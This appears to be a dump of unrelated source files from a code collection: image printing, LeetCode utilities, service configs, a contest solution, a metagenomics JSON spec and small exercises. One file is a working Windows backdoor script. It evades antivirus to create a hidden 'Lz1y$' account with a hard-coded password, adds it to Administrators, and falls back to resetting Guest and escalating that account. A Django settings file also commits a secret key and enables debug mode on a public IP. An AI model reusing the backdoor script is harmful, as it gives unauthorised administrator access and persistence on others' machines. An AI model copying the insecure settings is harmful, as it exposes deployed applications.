# 0.1 1996-04-20 fl Created
# 0.2 1996-10-04 fl Use draft mode when converting.
# 0.3 2003-05-06 fl Fixed a typo or two.
#
from __future__ import print_function
import getopt
import os
import sys
import subprocess
VERSION = "pilprint 0.3/2003-05-05"
from PIL import Image
from PIL import PSDraw
letter = (1.0*72, 1.0*72, 7.5*72, 10.0*72)
def description(filepath, image):
    """Return a one-line caption for *image*:
    "<basename> (<FORMAT> WxH MODE)", omitting FORMAT when unknown.
    """
    title = os.path.splitext(os.path.split(filepath)[1])[0]
    # `layout` instead of `format`: the original shadowed the builtin format().
    if image.format:
        layout = " (" + image.format + " %dx%d "
    else:
        layout = " (%dx%d "
    return title + layout % image.size + image.mode + ")"
# No file arguments: print usage and exit.
if len(sys.argv) == 1:
    print("PIL Print 0.3/2003-05-05 -- print image files")
    print("Usage: pilprint files...")
    print("Options:")
    print(" -c colour printer (default is monochrome)")
    print(" -d debug (show available drivers)")
    print(" -p print via lpr (default is stdout)")
    print(" -P <printer> same as -p but use given printer")
    sys.exit(1)
try:
    opt, argv = getopt.getopt(sys.argv[1:], "cdpP:")
except getopt.error as v:
    print(v)
    sys.exit(1)
printerArgs = []  # print to stdout
monochrome = 1  # reduce file size for most common case
for o, a in opt:
    if o == "-d":
        # debug: show available drivers
        Image.init()
        print(Image.ID)
        sys.exit(1)
    elif o == "-c":
        # colour printer
        monochrome = 0
    elif o == "-p":
        # default printer channel
        printerArgs = ["lpr"]
    elif o == "-P":
        # printer channel
        printerArgs = ["lpr", "-P%s" % a]
# Render each image as a one-page PostScript document, either to stdout or
# piped to lpr (per the -p/-P options above).
for filepath in argv:
    try:
        im = Image.open(filepath)
        title = description(filepath, im)
        if monochrome and im.mode not in ["1", "L"]:
            # draft() lets the decoder do a fast approximate greyscale pass
            # before the full convert, shrinking the PostScript output.
            im.draft("L", im.size)
            im = im.convert("L")
        if printerArgs:
            p = subprocess.Popen(printerArgs, stdin=subprocess.PIPE)
            fp = p.stdin
        else:
            fp = sys.stdout
        ps = PSDraw.PSDraw(fp)
        ps.begin_document()
        ps.setfont("Helvetica-Narrow-Bold", 18)
        ps.text((letter[0], letter[3]+24), title)
        ps.setfont("Helvetica-Narrow-Bold", 8)
        ps.text((letter[0], letter[1]-30), VERSION)
        ps.image(letter, im)
        ps.end_document()
        if printerArgs:
            fp.close()
    except Exception:
        # BUG FIX: was a bare `except:`, which also swallowed
        # KeyboardInterrupt and SystemExit; Exception keeps Ctrl-C working
        # while still reporting per-file decode/print failures.
        print("cannot print image", end=' ')
        print("(%s:%s)" % (sys.exc_info()[0], sys.exc_info()[1]))
| [
"sathi@mahdil.com"
] | sathi@mahdil.com |
8b1d765af3d85bf9ff7d1ae97ba2b77b9ad6777e | 24d9f077593b33c707b12d3a00cf91750f740729 | /src/utils.py | 8efc2f56c796915263859578fe1363f3dbb0998e | [
"Apache-2.0"
] | permissive | xiaonanln/myleetcode-python | 274c8b8d7c29fd74dd11beb845180fb4e415dcd1 | 95d282f21a257f937cd22ef20c3590a69919e307 | refs/heads/master | 2021-01-22T21:45:59.786543 | 2019-04-21T15:24:23 | 2019-04-21T15:24:23 | 85,474,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,012 | py | import sys
def mdarray(initVal, *dims): return [initVal] * dims[0] if len(dims) == 1 else [ mdarray(initVal, *dims[1:]) for _ in xrange(dims[0])]
class ListNode:
    # Singly linked list node: a value plus a pointer to the next node
    # (None terminates the list).
    def __init__(self, x):
        self.val = x
        self.next = None
def printlist(head):
    """Print a linked list as "v1->v2->...->[end]" (Python 2 print syntax)."""
    n = head
    vals = []
    while n is not None:
        vals.append(n.val)
        n = n.next
    print '->'.join(map(str, vals)) + '->[end]'
def makelist(*values):
    """Build a singly linked list of ListNode from the given values.

    Accepts either makelist(1, 2, 3) or makelist([1, 2, 3]); returns the
    head node, or None for empty input.
    """
    if len(values) == 1 and isinstance(values[0], list):
        values = values[0]
    head = None
    tail = None
    for val in values:
        node = ListNode(val)
        if tail is None:
            head = node
        else:
            tail.next = node
        tail = node
    return head
class TreeNode:
    # Binary tree node: a value plus left/right child pointers
    # (None marks a missing child).
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
def maketree(values):
    """Build a binary tree from a level-order value list.

    None entries mark missing children (and their subtrees are skipped on
    deeper levels, LeetCode-style).  Accepts either maketree([1, 2, 3]) or a
    single nested-list argument; returns the root TreeNode or None.
    """
    if len(values) == 1 and isinstance(values[0], list):
        values = values[0]
    if not values: return None
    root = TreeNode(values[0])
    next = 1  # NOTE(review): shadows the builtin next()
    deepest = [root]
    while next < len(values):
        assert deepest, (deepest, values)
        new_deepest = []
        for node in deepest:
            # Consume two values per node: left child, then right child.
            node.left = TreeNode(values[next]) if next < len(values) and values[next] is not None else None
            node.right = TreeNode(values[next+1]) if next+1 < len(values) and values[next+1] is not None else None
            if node.left:
                new_deepest.append(node.left)
            if node.right:
                new_deepest.append(node.right)
            next += 2
        deepest = new_deepest
    return root
def printtree(root):
    """Print a tree one value per line, indented by depth (Python 2 print)."""
    if root is None: print 'EMPTY TREE'
    # NOTE(review): still calls _printtree when root is None -- harmless,
    # since _printtree returns immediately for None.
    _printtree(root, 0)
def _printtree(root, level):
    # Pre-order traversal; each level adds one tab of indentation.
    if root is None: return
    print ('\t' * level) + str(root.val)
    _printtree(root.left, level+1)
    _printtree(root.right, level+1)
| [
"xiaonanln@gmail.com"
] | xiaonanln@gmail.com |
e7624008f621053eb84fcdeaba639ad1a2f74dcf | 4c68af90463865564ad710b4d50ad79c7e6ba5ac | /maintain_api/config.py | c37ba2c885f2bb7c0509d2b6d274b457830d751a | [
"MIT"
] | permissive | LandRegistry/maintain-api | d231f34105f594ea960327076a81bcd67a639a6c | fa1ecf71332b47606293c59eeaed8ae43d5231cd | refs/heads/master | 2020-04-03T21:16:28.830573 | 2018-10-26T14:45:00 | 2018-10-31T14:39:22 | 155,569,033 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,375 | py | import os
from urllib.parse import quote_plus
# RULES OF CONFIG:
# 1. No region specific code. Regions are defined by setting the OS environment variables appropriately to build up the
# desired behaviour.
# 2. No use of defaults when getting OS environment variables. They must all be set to the required values prior to the
# app starting.
# 3. This is the only file in the app where os.environ should be used.
# NOTE: per rule 2, every os.environ[...] access below deliberately raises
# KeyError at import time if the variable is missing.
# For logging
FLASK_LOG_LEVEL = os.environ['LOG_LEVEL']
# For health route
COMMIT = os.environ['COMMIT']
# This APP_NAME variable is to allow changing the app name when the app is running in a cluster. So that
# each app in the cluster will have a unique name.
APP_NAME = os.environ['APP_NAME']
# Mint API
MINT_API_URL = os.environ['MINT_API_URL']
MINT_API_URL_ROOT = os.environ['MINT_API_URL_ROOT']
# Search API URL
SEARCH_API_URL = os.environ['SEARCH_API_URL']
# Authentication
AUTHENTICATION_API_URL = os.environ['AUTHENTICATION_API_URL']
AUTHENTICATION_API_BASE_URL = os.environ['AUTHENTICATION_API_BASE_URL']
# --- Database variables start
# These must all be set in the OS environment.
# The password must be the correct one for either the app user or alembic user,
# depending on which will be used (which is controlled by the SQL_USE_ALEMBIC_USER variable)
SQL_HOST = os.environ['SQL_HOST']
SQL_DATABASE = os.environ['SQL_DATABASE']
SQL_PASSWORD = os.environ['SQL_PASSWORD']
APP_SQL_USERNAME = os.environ['APP_SQL_USERNAME']
ALEMBIC_SQL_USERNAME = os.environ['ALEMBIC_SQL_USERNAME']
if os.environ['SQL_USE_ALEMBIC_USER'] == 'yes':
    FINAL_SQL_USERNAME = ALEMBIC_SQL_USERNAME
else:
    FINAL_SQL_USERNAME = APP_SQL_USERNAME
# The password is URL-quoted so special characters survive embedding in the DSN.
# NOTE(review): the 'postgres://' scheme is rejected by SQLAlchemy >= 1.4
# ('postgresql://' is required there) -- confirm the pinned SQLAlchemy version
# before upgrading dependencies.
SQLALCHEMY_DATABASE_URI = 'postgres://{0}:{1}@{2}/{3}'.format(
    FINAL_SQL_USERNAME, quote_plus(SQL_PASSWORD), SQL_HOST, SQL_DATABASE)
SQLALCHEMY_TRACK_MODIFICATIONS = False  # Explicitly set this in order to remove warning on run
SQLALCHEMY_POOL_RECYCLE = int(os.environ['SQLALCHEMY_POOL_RECYCLE'])
# --- Database variables end
STATUTORY_PROVISION_CACHE_TIMEOUT_MINUTES = os.environ['STATUTORY_PROVISION_CACHE_TIMEOUT_MINUTES']
MAX_HEALTH_CASCADE = os.environ['MAX_HEALTH_CASCADE']
# Downstream services checked by the cascading health route.
DEPENDENCIES = {
    "postgres": SQLALCHEMY_DATABASE_URI,
    "mint-api": MINT_API_URL_ROOT,
    "search-api": SEARCH_API_URL,
    "authentication-api": AUTHENTICATION_API_BASE_URL
}
# logging.config.dictConfig-style configuration: JSON-formatted app logs plus
# a separate 'audit' logger, both to stdout.
LOGCONFIG = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'simple': {
            '()': 'maintain_api.extensions.JsonFormatter'
        },
        'audit': {
            '()': 'maintain_api.extensions.JsonAuditFormatter'
        }
    },
    'filters': {
        'contextual': {
            '()': 'maintain_api.extensions.ContextualFilter'
        }
    },
    'handlers': {
        'console': {
            'class': 'logging.StreamHandler',
            'formatter': 'simple',
            'filters': ['contextual'],
            'stream': 'ext://sys.stdout'
        },
        'audit_console': {
            'class': 'logging.StreamHandler',
            'formatter': 'audit',
            'filters': ['contextual'],
            'stream': 'ext://sys.stdout'
        }
    },
    'loggers': {
        'maintain_api': {
            'handlers': ['console'],
            'level': FLASK_LOG_LEVEL
        },
        'audit': {
            'handlers': ['audit_console'],
            'level': 'INFO'
        }
    }
}
| [
"james.lademann@landregistry.gov.uk"
] | james.lademann@landregistry.gov.uk |
d200d0184ab94946218cf6520cfcdc3467b09255 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/arc087/A/3622945.py | a059d27d881c55058b7b747bc2cf9607e6321128 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 651 | py | import sys
# Competitive-programming fast-input helpers: each call reads ONE line
# from standard input.
stdin = sys.stdin
sys.setrecursionlimit(10**5)
def li(): return map(int, stdin.readline().split())  # line -> ints (lazy map)
def li_(): return map(lambda x: int(x)-1, stdin.readline().split())  # ints shifted to 0-based
def lf(): return map(float, stdin.readline().split())  # line -> floats (lazy map)
def ls(): return stdin.readline().split()  # line -> list of whitespace-split tokens
def ns(): return stdin.readline().rstrip()  # line with trailing whitespace stripped
def lc(): return list(ns())  # line -> list of individual characters
def ni(): return int(stdin.readline())  # line -> single int
def nf(): return float(stdin.readline())  # line -> single float
from collections import Counter
n = ni()  # element count: consumed from input but not otherwise needed
a = list(li())
cnt = Counter(a)
# For a value k occurring v times: if v < k all v copies must be removed,
# if v > k the surplus v - k must go, and if v == k nothing is removed.
ans = sum(v if v < k else v - k for k, v in cnt.items() if v != k)
print(ans) | [
"kwnafi@yahoo.com"
] | kwnafi@yahoo.com |
b5506cd71935af49e4d46d32e3ad9340f7b8ffa8 | 2b42b40ae2e84b438146003bf231532973f1081d | /spec/mgm4458101.3.spec | 27053690d85f2cf5bc6042987cc59427e5ca2c71 | [] | no_license | MG-RAST/mtf | 0ea0ebd0c0eb18ec6711e30de7cc336bdae7215a | e2ddb3b145068f22808ef43e2bbbbaeec7abccff | refs/heads/master | 2020-05-20T15:32:04.334532 | 2012-03-05T09:51:49 | 2012-03-05T09:51:49 | 3,625,755 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,309 | spec | {
"id": "mgm4458101.3",
"metadata": {
"mgm4458101.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 657409,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 311,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 31360,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 306,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 450,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/205.screen.h_sapiens_asm.info"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 1534,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 403251,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 388,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 311,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 20639,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 309,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 895056,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 49,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 124640,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 44443,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 25875,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 277984,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 6665,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 5173,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 11111,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 16018,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 9393968,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 98,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 426,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 36,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 901,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 1354,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 487,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 258,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 22866,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 79,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 4979,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.species.stats"
}
},
"id": "mgm4458101.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4458101.3"
}
},
"raw": {
"mgm4458101.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4458101.3"
}
}
} | [
"jared.wilkening@gmail.com"
] | jared.wilkening@gmail.com |
e85cfedc1dfff139224d07cd93ee4c56cca29c0d | 25279384025751b3b400aea006f164d66c167104 | /Sytem_demo/绕过360创建用户.py | 0905c44166dfef60318e16f76264d8548adfe5cc | [] | no_license | linruohan/my_study | 6fda0b49f4c671919ec7a7fc6ba596b49ec66e59 | 7666f93259495b6928751d50eb1bab114e118038 | refs/heads/master | 2020-03-28T18:26:47.776943 | 2018-09-17T05:52:17 | 2018-09-17T05:52:17 | 148,882,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,060 | py | import win32api
import win32net
import win32netcon
verbose_level = 0
server = None # Run on local machine.
def CreateUser():
    "Creates a new test user, then deletes the user"
    # SECURITY NOTE(review): contrary to the docstring, nothing is deleted at
    # the end.  This creates a local account 'Lz1y$' (the trailing '$' hides
    # it from some account listings) with a hard-coded password and then
    # escalates it to Administrators via LocalGroup().  This is backdoor-style
    # behaviour: run only on systems you are explicitly authorised to test.
    a = """#Author: Lz1y
#Blog:http://www.Lz1y.cn\n\n\n\n"""
    print(a)
    testName = "Lz1y$"
    # Drop any stale account of the same name so NetUserAdd cannot collide.
    try:
        win32net.NetUserDel(server, testName)
        print("Warning - deleted user before creating it!")
    except win32net.error:
        pass
    # Level-1 USER_INFO structure passed to NetUserAdd below.
    d = {}
    d['name'] = testName
    d['password'] = 'P@ssW0rd!!!'
    d['priv'] = win32netcon.USER_PRIV_USER
    d['comment'] = None
    d['flags'] = win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT
    try:
        win32net.NetUserAdd(server, 1, d)
        print("CreateUser Successed!")
        print("Username is "+testName)
        LocalGroup(testName)
    except:  # NOTE(review): bare except hides the real failure reason
        print("Sorry,CreateUser Failed!")
        print("Try to Change Guest!")
        ChangeGuest()
def LocalGroup(uname=None):
    "Creates a local group, adds some members, deletes them, then removes the group"
    # NOTE(review): the docstring is inaccurate -- this only ADDS `uname`
    # (default 'Lz1y$') to the existing local Administrators group, i.e.
    # privilege escalation; nothing is created, deleted or removed.
    level = 3  # info level 3: members given in 'domainandname' form (see dict below)
    if uname is None: uname="Lz1y$"
    # Qualify a bare username with the machine/domain name.
    if uname.find("\\")<0:
        uname = win32api.GetDomainName() + "\\" + uname
    group = 'Administrators'
    try:
        u={'domainandname': uname}
        win32net.NetLocalGroupAddMembers(server, group, level, [u])
        mem, tot, res = win32net.NetLocalGroupGetMembers(server, group, level)
        print("Add to Administrators Successd!"+'\n'+"Username:Lz1y$\npassword:P@ssW0rd!!!")
    except:  # NOTE(review): bare except swallows the actual error
        print("Sorry,Add to Administrators Failed!")
def ChangeGuest():
    # SECURITY NOTE(review): fallback path -- resets the built-in Guest
    # account's password to a hard-coded value and adds Guest to the local
    # Administrators group.  Same authorised-testing-only caveat as
    # CreateUser() applies.
    level=3
    uname="Guest"
    group = 'Administrators'
    try:
        # The same string is passed as both old and new password --
        # presumably this relies on elevated (SYSTEM) privileges or on the
        # Guest password already having this value; verify before relying on it.
        win32net.NetUserChangePassword(None,uname,"P@ssW0rd!!!","P@ssW0rd!!!")
        u={'domainandname': uname}
        win32net.NetLocalGroupAddMembers(server, group, level, [u])
        mem, tot, res = win32net.NetLocalGroupGetMembers(server, group, level)
        print("Change Guest Successd!"+'\n'+"Username:Guest\npassword:P@ssW0rd!!!")
    except:  # NOTE(review): bare except swallows the actual error
        print("Change Guest Failed!Your priv must be System")
CreateUser() | [
"mjt1220@126.com"
] | mjt1220@126.com |
710ef00ecca7a2d4948cd6f3da2950555dda2974 | c2849586a8f376cf96fcbdc1c7e5bce6522398ca | /ch08/ex8-5.py | 2db05423dda3d46e39af01c7f937fdf5eb56bf12 | [] | no_license | freebz/Learning-Python | 0559d7691517b4acb0228d1cc76de3e93915fb27 | 7f577edb6249f4bbcac4f590908b385192dbf308 | refs/heads/master | 2020-09-23T01:48:24.009383 | 2019-12-02T12:26:40 | 2019-12-02T12:26:40 | 225,371,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | # 리스트 메서드 호출
L = ['eat', 'more', 'SPAM!']
L.append('please') # Call the append method: adds an item at the end of the list
L
# ['eat', 'more', 'SPAM!', 'please']
L.sort() # Sort the list items in place ('S' < 'e': uppercase sorts before lowercase)
L
# ['SPAM!', 'eat', 'more', 'please']
| [
"freebz@hananet.net"
] | freebz@hananet.net |
3f660de7246377aed56171a5b3a247539393fa1e | ce8c59b637d024424d331c1b2b9df3bd9d91c5a5 | /tasks_8/homework/task_8_3.py | 51e6f1accb79e6ba49cc85ca9a9e18a851fb8e18 | [] | no_license | htmlprogrammist/kege-2021 | 7ca9155724e8041b807405d23391fb6503a7589b | 4fa3cd9a0cc4213bbdf4576894953452b256b56e | refs/heads/master | 2023-06-03T19:56:09.160795 | 2021-06-25T09:07:31 | 2021-06-25T09:07:31 | 308,915,777 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | """
Вася составляет 4-буквенные коды из букв У, Л, Е, Й. Каждую букву нужно использовать ровно 1 раз,
при этом код не может начинаться с буквы Й и не может содержать сочетания ЕУ.
Сколько различных кодов может составить Вася?
"""
from itertools import permutations


def count_codes(letters='УЛЕЙ', banned_start='Й', banned_pair='ЕУ'):
    """Count the distinct codes Vasya can compose: permutations of `letters`
    (each letter used exactly once) that do not start with `banned_start`
    and do not contain the substring `banned_pair`.

    Generalised from the original hard-coded brute force: any alphabet and
    restrictions may be supplied; the defaults reproduce the original task.
    """
    total = 0
    # permutations() already guarantees every letter appears exactly once,
    # replacing the original four nested loops plus per-code count() scans.
    for perm in permutations(letters):
        code = ''.join(perm)
        if not code.startswith(banned_start) and banned_pair not in code:
            total += 1
    return total


# Same observable behaviour as the original script: print the answer (14).
print(count_codes())
| [
"badmaeve2511@gmail.com"
] | badmaeve2511@gmail.com |
368e6ea2ec3beae8484e00f5d2b77552687787da | d04d3eec289376e7682403af2f32044b3991d27b | /6 - Objects and Classes/Lab-1.py | bc2ec3fd61e84ac0da482be820de7019f23c313e | [] | no_license | m-evtimov96/softUni-python-fundamentals | 190002dbc6196211340126814e8ed4fce3b8a07f | 817a44a3d78130d37e58facfc7bcfdc8af5f4051 | refs/heads/master | 2020-12-10T12:45:27.847764 | 2020-06-23T13:09:43 | 2020-06-23T13:09:43 | 233,598,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | class Comment:
def __init__(self, username, content, likes = 0):
self.username = username
self.content = content
self.likes = likes
# Demo: build a comment and print its fields; `likes` falls back to the default 0.
comment = Comment('user1', 'I like this book')
print(comment.username)
print(comment.content)
print(comment.likes)
| [
"m.evtimov196@gmail.com"
] | m.evtimov196@gmail.com |
7042a0bd3044411ecbe1410052639e87c767e370 | 1f227fa290b9b0669722ba5144f99b9b7f969d32 | /trash7djangoProject/settings.py | edaeea2e1d292b6038c57905937018d0679f72ef | [] | no_license | sglee487/trash7djangoProject | c8188259283cd89711cea9ff456c7224db841216 | 4bc9cc022199cfe83a876031901c98e202df2193 | refs/heads/master | 2023-08-16T22:03:25.294216 | 2021-10-02T03:25:53 | 2021-10-02T03:25:53 | 380,723,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,395 | py | """
Django settings for trash7djangoProject project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control -- rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = 'django-insecure-r5bxqn2252sqg+=myto!b47otc(jy+rf25@nspec-5pt@-d7$y'
# SECURITY WARNING: don't run with debug turned on in production!
# NOTE(review): DEBUG is True while ALLOWED_HOSTS lists a public IP -- this
# looks like a production host running in debug mode; confirm and disable.
DEBUG = True
ALLOWED_HOSTS = ['13.209.34.118']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'sslserver'
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'trash7djangoProject.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [BASE_DIR / 'templates']
        ,
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'trash7djangoProject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
